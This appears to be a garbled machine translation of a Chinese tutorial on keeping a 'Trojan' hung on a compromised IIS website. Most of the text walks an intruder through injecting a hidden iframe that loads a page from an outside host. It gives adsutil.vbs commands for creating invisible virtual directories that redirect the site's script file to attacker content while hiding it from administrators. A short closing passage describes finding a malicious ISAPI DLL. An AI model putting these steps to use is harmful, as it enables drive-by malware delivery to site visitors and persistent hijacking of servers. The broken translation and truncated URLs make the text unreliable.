<script src=include/mm2. js></script>
Then we have the means, go to the Modify include/mms2. js attribute! As shown in Figure II, go to one of our pages, the content of course to be able to in the script tag in the explanation, such as:
document. write("<iframe style='display:none;' src=http://jnclovesw. com width=0 height=0></iframe>");
This can be the introduction of our page! Of course, the best to achieve his JS functions! That's enough take cover! Now administrators will find the home has not changed, go to IIs to see the home's attributes have not changed, even host any of the www documents are not modified, he will be very depressed! Huh! If he just put the previous site backup and recovery back is also no way to get the page changed back! IIs file so much he can't a property! Here by the way a problem is you choose to redirect the last file must be referenced in his html markup can explain, otherwise there is no effect! For example, a<img src=1. jpg>you put 1. jpg redirected to our Trojans page is of no use, because the Trojan page is not treated as Html parsing, but sent to the img tag as a picture! I think the energy use of the mark which is the script and frame, as for Css, I want to also be able to use, but using the method I have yet to find! Also don't know my analysis was right, and everyone is welcome to advise! Let's continue now! Suppose in case your administrator enough good or be good, he found you in the mm2. the js above to do the hands and feet, he will be from the IIs inside the his recovery the past! Our dreams and shattered! There is no more covert methods? Let the Administrators in IIs it can't find? The answer is Yes! Everyone must remember a long time ago that the IIS configuration vulnerabilities, you can create an invisible virtual directory, and then inside build a back door in! We can also borrow to take advantage of Oh! Look at the IIS configuration exploits the principle is that the establishment of a physical directory of a virtual directory, so it will be in IIs invisible, then you can be in this directory to do some little tricks! Here we first create an invisible virtual directory, if the home page in the call to the include folder under the js file, we build the include directory! This can be by means of IIS the script to achieve, wherein the adsutil. the vbs script is in the IIs install directory such as C:\Inetpub\AdminScripts under is Control IIS behavior of a script, we use the command as follows:
cscript adsutil. vbs Create W3SVC/1/Root/www/include "IIsWebVirtualDir"
This will establish a IIs the invisible virtual directory, because there is no set path so it will not display! Then in this directory create a name called mm2. js virtual directory, huh! Actually the establishment of a virtual directory can be used to. Special characters like:
cscript adsutil. vbs Create W3SVC/1/Root/www/include/mm2.js "IIsWebVirtualDir"
Thus there is a include/mm2. js virtual directory! What comes to mind? Is not with the home page call that file name has been, Oh! We continue to do!
cscript adsutil. vbs set W3SVC/1/Root/www/include/mm2. js/httpredirect "http://jnclovesw.com/mm1.j...
This is to change the mm2. js virtual directory redirection feature, as shown in Figure three. Note that one of the W3SVC/1/Root/www/representative IIs under the firstweb serverthe www virtual directory, everyone is unclear if you can use the adsutil. vbs enum parameter to the query yourself you need to change the website, other operations can open the adsutil. vbs script help! Such operation after you set up a virtual directory redirection feature, 现在试着在主页里调用include/mm2.js you guess the return is mm2. js the content or our mm1. js content? 答案 是 mm1.js as shown in Figure four, and the physical file is still there! This is perhaps the IIS properties! He first processes the user's request, and the virtual directory in preference to physical files! Then we went to IIS to see what there is does not have to include the virtual directory! As shown in Figure five, no! Huh! So, we successfully bypass the permission restrictions and administrator of the detection! Our Trojans hang on to each other on the site, and unless the other party to redo the IIs or remove our hidden virtual directory, otherwise he is very difficult to remove we are the Trojans!
The article is very simple, the key is the IIS script command and on IIs some understanding of this hanging horse way adapted to obtain administrator privileges after hung it against those who just diligent administrator is still very useful! We later found the site there is a problem remember to use this script to view The has not a problem! Or simply put the IIS settings back up! Encountered problems the IIs settings are also restored, huh!
<iframe src="http://xxxdfsfd/web.htm&qu... height=0 width=0></iframe>
This style of code is generally in the head portion of the antivirus will open the packet of poison
Open the HTML or ASP PHP page in the source code how to find this code
First suspect is JS looking for a half day or not found link a new HTML page will also have this piece of code to
Carefully look for the problem should be in IIS Open IIS restart once in the main on IIS, right click Properties the ISAPI find an ISAPI extension not seen
Path is: c:\windows\help\wanps.dll ISAP load the normal green state
Cancel restart IIS and all the code disappears
Load the item contains three files:
wanps. ini content is:
wanps. txt content: